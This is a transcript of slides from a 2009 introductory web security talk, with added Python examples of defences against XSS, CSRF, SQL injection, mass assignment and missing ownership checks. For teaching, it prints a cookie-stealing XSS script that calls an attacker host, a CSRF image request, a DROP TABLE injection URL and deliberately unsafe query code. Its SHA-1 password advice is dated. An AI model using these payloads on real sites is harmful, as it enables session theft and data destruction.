2009 Barcamp Nashville Web Security 101
A super-brief (25 minute) talk on the basics of web security. A video (with poor audio that doesn't kick in until 9 minutes in, I'm sorry) is available here:
http://www.ustream.tv/recorded/2369801

Published in: Technology

  1. Web Security 101
  2. Who is this guy? Brian Dailey, realm3 web applications
  3. Security is serious.
  4. Even when you might think it's not.
  5. TRUST ME. Security is all about trust.
  6. Physical. Network. Server. Application.
  7. XSS. The user believes you are this guy: But this guy is really watching:
  8. XSS: Methods. Non-persistent: entice the user to load a page (either by clicking a link or through a hidden frame) and inject client-side script. Persistent: save the script to the database and get users to load the page that renders it.
  9. XSS. Give me back my session!
       <script>
       document.write('<img src="http://my.hacker.com/me.php?cookie=' + document.cookie + '" width="1" height="1" />');
       </script>
  10. XSS. Another example: embed a form that captures a saved password, then collect it. If you can inject JavaScript or HTML, you can do all sorts of nefarious things.
  11. XSS Prevention. Always escape output. How you escape depends upon the context: URL encoding,
  12. HTML entities,
  13. whitelisting HTML tags (blacklisting is tricky!).
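Slides 11 to 13 say the escaping has to match the output context. The following is an added example, written in Python for this page and not part of the talk, that renders one untrusted value into three contexts of a page (HTML body, URL query parameter, JavaScript string literal) with a different encoder for each. The payload is constructed after the cookie-stealing script on slide 9; the helper names are my own.

```python
import html
import json
from urllib.parse import quote

# Constructed attacker-controlled input, modelled on the slide's cookie-stealing script.
UNTRUSTED = (
    "<script>document.write('<img src=\"http://my.hacker.com/me.php?cookie='"
    "+document.cookie+'\">')</script>"
)


def escape_html(value: str) -> str:
    """HTML body or quoted-attribute context: encode & < > " ' as entities."""
    return html.escape(value, quote=True)


def escape_url_param(value: str) -> str:
    """URL query-string context: percent-encode everything but unreserved characters."""
    return quote(value, safe="")


def escape_js_string(value: str) -> str:
    """JavaScript string-literal context: JSON-encode, then also encode < and > so the
    browser's HTML parser cannot find a closing </script> inside the literal."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def render_profile(name: str) -> str:
    """Render the same untrusted value into all three contexts of one page."""
    return (
        f"<h1>Hello, {escape_html(name)}</h1>\n"
        f'<a href="/search?q={escape_url_param(name)}">search</a>\n'
        f"<script>var name = {escape_js_string(name)};</script>"
    )


def payload_survives(page: str, payload: str) -> bool:
    """Demo check: did the raw payload make it into the rendered page unchanged?"""
    return payload in page


if __name__ == "__main__":
    page = render_profile(UNTRUSTED)
    print(page)
    print("payload survived:", payload_survives(page, UNTRUSTED))
```

Using the HTML-entity encoder everywhere is the common mistake: an entity-encoded value dropped into a JavaScript string is still decoded by the JavaScript parser, and a value dropped into a URL needs percent-encoding, not entities. The rendered page above contains exactly one `<script>` tag, the one the template wrote.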
  14. CSRF (Cross-Site Request Forgery). Exploits the server's trust of the user.
  15. CSRF. You think this is your user: But really it is:
  16. CSRF Example:
       <img src="http://your.site.com/addtocart.php?item-id=12&ship_to=l33t_haxor" height="1" width="1" />
      Works especially well with GET requests, but using POST is not a surefire way to prevent this.
  17. CSRF Prevention Techniques. Authorize each user action. Don't use GET when modifying data.
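Slide 17's "authorize each user action" is usually implemented with a per-session token that only a page served by the site could have embedded in its form. The following is an added example, written in Python for this page and not part of the talk: an `addtocart` handler that refuses GET for a state-changing action (which defeats the hidden-image trick on slide 16) and requires a session-bound CSRF token on POST (which defeats a forged cross-site form, since the browser sends the victim's cookie automatically but the attacking page cannot read the token). The in-memory `sessions` dict, the request dict layout and the handler names are constructed stand-ins for a real framework.

```python
import hmac
import secrets

# Constructed stand-in for server-side session storage: session id -> session data.
sessions = {}


def new_session() -> str:
    """Create a session with a fresh, unguessable CSRF token."""
    sid = secrets.token_urlsafe(16)
    sessions[sid] = {"csrf_token": secrets.token_urlsafe(32), "cart": []}
    return sid


def csrf_token_for(sid: str) -> str:
    """The value a template embeds as a hidden form field."""
    return sessions[sid]["csrf_token"]


def add_to_cart(request: dict) -> tuple:
    """Handler for a state-changing action.

    `request` is a constructed dict with 'method', 'cookies' and 'form' keys.
    Returns (status code, message).
    """
    sid = request["cookies"].get("session")
    if sid not in sessions:
        return 401, "no session"

    # Slide 17: never modify data on GET. An <img src=...> can only make a GET.
    if request["method"] != "POST":
        return 405, "state-changing actions must use POST"

    # Require the per-session token. Constant-time comparison avoids leaking
    # how many leading characters of a guess were right.
    submitted = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(submitted, sessions[sid]["csrf_token"]):
        return 403, "bad CSRF token"

    sessions[sid]["cart"].append(
        {"item_id": request["form"]["item_id"], "ship_to": request["form"]["ship_to"]}
    )
    return 200, "added"


if __name__ == "__main__":
    sid = new_session()
    forged = {"method": "GET", "cookies": {"session": sid},
              "form": {"item_id": "12", "ship_to": "l33t_haxor"}}
    print(add_to_cart(forged))  # rejected: GET
    real = {"method": "POST", "cookies": {"session": sid},
            "form": {"item_id": "12", "ship_to": "home", "csrf_token": csrf_token_for(sid)}}
    print(add_to_cart(real))    # accepted
```

Rejected requests (405 and 403 from a logged-in session) are worth logging: a burst of them from many different sessions is what a CSRF campaign looks like from the server side.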
  18. SQL Injection
  19. SQL Injection.
       String sql = "SELECT * FROM users WHERE name LIKE '%" + name + "'";
      A request such as
       http://www.subgenius.com/person.jsp?name=foobar';+DROP+TABLE+USERS--
      makes the user-supplied name part of the SQL statement.
  20. SQL Injection Prevention. This one is pretty easy: use parameterized statements. (You could also escape control characters, but there are issues with that.)
       String sql = "SELECT * FROM users WHERE name LIKE ?";
       java.sql.PreparedStatement stmt = conn.prepareStatement(sql);
       stmt.setString(1, request.getParameter("name"));
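Slides 19 and 20 side by side, as an added example written in Python against an in-memory SQLite table; this is not code from the talk. The concatenating query is kept deliberately unsafe to show the difference. The payload is constructed and closes the quoted string to add an always-true condition rather than the slide's `DROP TABLE`, because Python's `sqlite3` refuses to run more than one statement per `execute()` call; the point is the same: with concatenation the input changes the query, with a parameter it cannot.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users (name) VALUES (?)",
                     [("bob",), ("alice",), ("dobbs",)])
    return conn


def find_users_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    """The slide's pattern: the user-supplied value is pasted into the SQL text, so
    quote characters in it change the statement. Deliberately unsafe."""
    sql = "SELECT name FROM users WHERE name LIKE '%" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def find_users_safe(conn: sqlite3.Connection, name: str) -> list:
    """Parameterized statement: the value travels separately from the SQL text and is
    never parsed as SQL, whatever characters it contains."""
    sql = "SELECT name FROM users WHERE name LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + name,))]


if __name__ == "__main__":
    conn = make_db()
    injected = "zzz' OR '1'='1"   # constructed: closes the literal, adds a true clause
    print("concatenated:", find_users_vulnerable(conn, injected))   # every row
    print("parameterized:", find_users_safe(conn, injected))        # no rows
```

Note that the `%` wildcard is added to the parameter value, not to the SQL text: LIKE patterns are data too, and if user input may contain `%` or `_` you also need to decide whether those should act as wildcards.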
  21. Frameworks are helpful.
  22. They can come with their own set of issues.
  23. Mass Assignment
  24. Mass Assignment. Rails example:
       @user = User.find(current_user.id)
       @user.update_attributes(params[:user])
      If I POST user[is_admin]=1: W00t! I pwned u! Fix by using attr_accessible (in the model) or by whitelisting. http://www.quarkruby.com/2007/9/20/ruby-on-rails-security-guide
  25. Mass Assignment. Symfony: if you're using Forms, you're not vulnerable. (Kudos to Symfony.) CakePHP:
       # Anything in $this->data could be changed!
       # This makes me sad.
       $this->Post->save($this->data);
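The `attr_accessible` fix on slide 24 is a whitelist on the model: only declared attributes may be set from a request hash. The following is an added example, written in Python for this page and not part of the talk or of Rails, with a tiny `Model` class standing in for an ActiveRecord model, a `parse_form` helper that turns `user[is_admin]=1` into the nested hash the slide calls `params[:user]`, and both the unsafe and the whitelisted update so the difference is visible. All names are constructed.

```python
class Model:
    """Minimal stand-in for an ActiveRecord-style model (constructed for the demo)."""

    # attr_accessible equivalent: attributes that bulk assignment may touch.
    # Empty by default, so a model that declares nothing cannot be mass-assigned at all.
    accessible = frozenset()

    def __init__(self, **fields):
        self.__dict__.update(fields)

    def update_attributes_unsafe(self, params: dict) -> None:
        """The slide's pattern: every posted key becomes an attribute, is_admin included."""
        for key, value in params.items():
            setattr(self, key, value)

    def update_attributes(self, params: dict) -> set:
        """Whitelisted bulk assignment. Returns the rejected keys so the caller can log
        them: a request that tries to set is_admin is worth an alert, not just a drop."""
        rejected = {key for key in params if key not in self.accessible}
        for key, value in params.items():
            if key in self.accessible:
                setattr(self, key, value)
        return rejected


class User(Model):
    accessible = frozenset({"name", "email"})   # is_admin is deliberately absent


def parse_form(flat: dict) -> dict:
    """Turn Rails-style keys such as 'user[is_admin]' into {'user': {'is_admin': ...}}."""
    nested = {}
    for key, value in flat.items():
        if key.endswith("]") and "[" in key:
            outer, inner = key[:-1].split("[", 1)
            nested.setdefault(outer, {})[inner] = value
        else:
            nested[key] = value
    return nested


if __name__ == "__main__":
    # Constructed POST body: the attacker adds user[is_admin]=1 to a profile form.
    posted = parse_form({"user[name]": "Bob", "user[email]": "bob@example.com",
                         "user[is_admin]": "1"})
    victim = User(id=7, name="bob", is_admin=False)
    victim.update_attributes_unsafe(posted["user"])
    print("unsafe:", victim.is_admin)            # "1"
    victim = User(id=7, name="bob", is_admin=False)
    print("rejected:", victim.update_attributes(posted["user"]))   # {'is_admin'}
    print("safe:", victim.is_admin)              # False
```

A whitelist is preferable to a blacklist of "dangerous" attributes for the same reason slide 13 gives for HTML tags: a column added next month is protected by default under a whitelist and exposed by default under a blacklist.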
  26. Ownership
  27. Ownership Authorization. Rails:
       # bad
       @post = Post.find(params[:id])
       # good
       @post = current_user.posts.find(params[:id])
  28. Ownership Authorization. CakePHP:
       // bad
       $post = $this->Post->findById($id);
       // good
       $post = $this->Post->find(array(
           'conditions' => array(
               'id' => $id,
               'user_id' => $this->Auth->user('id'),
           ),
       ));
  29. Ownership Authorization. Symfony:
       // bad
       $post = Doctrine::getTable('Post')->find($id);
       // good (andWhere appends; a second where() would replace the id condition)
       $post = Doctrine_Query::create()
           ->select('*')
           ->from('Post p')
           ->where('p.id = ?', $id)
           ->andWhere('p.user_id = ?', $user_id)
           ->fetchOne();
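Slides 27 to 29 make the same point in three frameworks: put the ownership condition into the query, so a record that is not the current user's is simply not found. The following is an added example, written in Python against an in-memory SQLite table and not part of the talk, that applies it to an update rather than a read, where the damage is more obvious. The "bad" version is authenticated (we know who the user is) but not authorized (we never ask whether the post is theirs); the "good" version adds `user_id` to the `WHERE` clause and treats zero affected rows as "not found". Table, rows and function names are constructed.

```python
import sqlite3


def make_posts_db() -> sqlite3.Connection:
    """Constructed posts table: post 1 belongs to user 100, post 2 to user 200."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE posts (id INTEGER PRIMARY KEY, user_id INTEGER NOT NULL, title TEXT)"
    )
    conn.executemany("INSERT INTO posts VALUES (?, ?, ?)",
                     [(1, 100, "alice's draft"), (2, 200, "bob's draft")])
    return conn


def rename_post_bad(conn: sqlite3.Connection, post_id: int, new_title: str) -> bool:
    """The 'bad' pattern: the post is selected by id alone, so any logged-in user
    who knows (or guesses) an id can change anyone's post. Deliberately unsafe."""
    cur = conn.execute("UPDATE posts SET title = ? WHERE id = ?", (new_title, post_id))
    return cur.rowcount == 1


def rename_post_good(conn: sqlite3.Connection, current_user_id: int,
                     post_id: int, new_title: str) -> bool:
    """The 'good' pattern: ownership is part of the query, so a foreign id matches
    zero rows. A False result is the handler's cue to answer 404, not 403: there is
    no need to confirm that the id exists."""
    cur = conn.execute(
        "UPDATE posts SET title = ? WHERE id = ? AND user_id = ?",
        (new_title, post_id, current_user_id),
    )
    return cur.rowcount == 1


def title_of(conn: sqlite3.Connection, post_id: int) -> str:
    return conn.execute("SELECT title FROM posts WHERE id = ?", (post_id,)).fetchone()[0]


if __name__ == "__main__":
    conn = make_posts_db()
    # User 100 submits a rename for post 2, which belongs to user 200.
    print("bad:", rename_post_bad(conn, 2, "defaced"), title_of(conn, 2))
    conn = make_posts_db()
    print("good:", rename_post_good(conn, 100, 2, "defaced"), title_of(conn, 2))
```

Scoping the query is also cheaper and less error-prone than loading the record and then comparing `post.user_id` to the current user in application code, because there is no second step to forget.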
  30. Other Considerations.
      > Rate limit user login attempts to prevent brute-force attacks.
        + Use caching (memcache) to track attempts.
      > Always hash user passwords.
        + MD5 is no good; use SHA-1 or SHA-256, and a salt.
      Useful Resources:
      > Potential Attacks Overview (OWASP has a ton of info!): http://www.owasp.org/index.php/Category:Attack
      > Google Code University on Web Security: http://code.google.com/edu/security/index.html
      > Rails Security Guide: http://www.quarkruby.com/2007/9/20/ruby-on-rails-security-guide
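Both points on slide 30 in one added example, written in Python for this page and not part of the talk. The attempt counter keeps a count and an expiry per key in a plain dict that stands in for memcache (a real deployment would use the cache's expiring keys and atomic increment instead). For passwords it goes one step past the slide: SHA-256 with a random salt, but run through PBKDF2 so each guess costs the attacker many hashes instead of one, since a single salted SHA-256 is still fast to brute-force offline. Function names, the time source and the constructed credentials are assumptions.

```python
import hashlib
import hmac
import os

MAX_ATTEMPTS = 5          # failures allowed per window before lockout
WINDOW_SECONDS = 300      # lockout window

# Constructed in-memory stand-in for memcache: key -> (failure count, window expiry).
attempt_store = {}


def record_failed_attempt(key: str, now: float) -> int:
    """Increment the failure count for `key`, starting a new window if the old one expired."""
    count, expires = attempt_store.get(key, (0, 0.0))
    if now >= expires:
        count, expires = 0, now + WINDOW_SECONDS
    count += 1
    attempt_store[key] = (count, expires)
    return count


def is_locked_out(key: str, now: float) -> bool:
    count, expires = attempt_store.get(key, (0, 0.0))
    return now < expires and count >= MAX_ATTEMPTS


def hash_password(password: str, salt: bytes = None, iterations: int = 100_000) -> str:
    """Salted, iterated SHA-256 (PBKDF2). The salt is stored with the hash so it can
    be recomputed at login; it is random so two users with the same password do not
    share a hash and precomputed tables are useless."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_password(password: str, stored: str) -> bool:
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate.hex(), digest_hex)


def login(username: str, password: str, stored_hash: str, now: float) -> str:
    """Returns 'ok', 'bad_credentials' or 'locked_out'. While locked out, even the
    correct password is refused, so the lock cannot be used as a password oracle."""
    key = "login:" + username
    if is_locked_out(key, now):
        return "locked_out"
    if verify_password(password, stored_hash):
        attempt_store.pop(key, None)     # success clears the counter
        return "ok"
    record_failed_attempt(key, now)
    return "bad_credentials"


if __name__ == "__main__":
    stored = hash_password("correct horse")   # constructed credential
    t = 1000.0
    for _ in range(MAX_ATTEMPTS):
        print(login("alice", "wrong", stored, t))
    print(login("alice", "correct horse", stored, t))                        # locked_out
    print(login("alice", "correct horse", stored, t + WINDOW_SECONDS + 1))   # ok
```

Keying the counter by username catches a brute-force against one account from many addresses; keying a second counter by client IP catches one address trying many accounts, and the two are worth tracking together in the login logs.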
  31. Wrapping Things Up. DO: Assume that users can be malicious. Assume that your data is important (it should be!). DON'T: Assume your framework handles all security concerns. Assume your application is "unbreakable."
  32. Thanks! Any questions? Brian Dailey, realm3 web applications. Web: http://realm3.com/ Twitter: @brian_dailey Email: brian@realm3.com Phone: 917-512-3594 Slide background: http://bit.ly/xc0m1 Kudos to: http://asi9.net/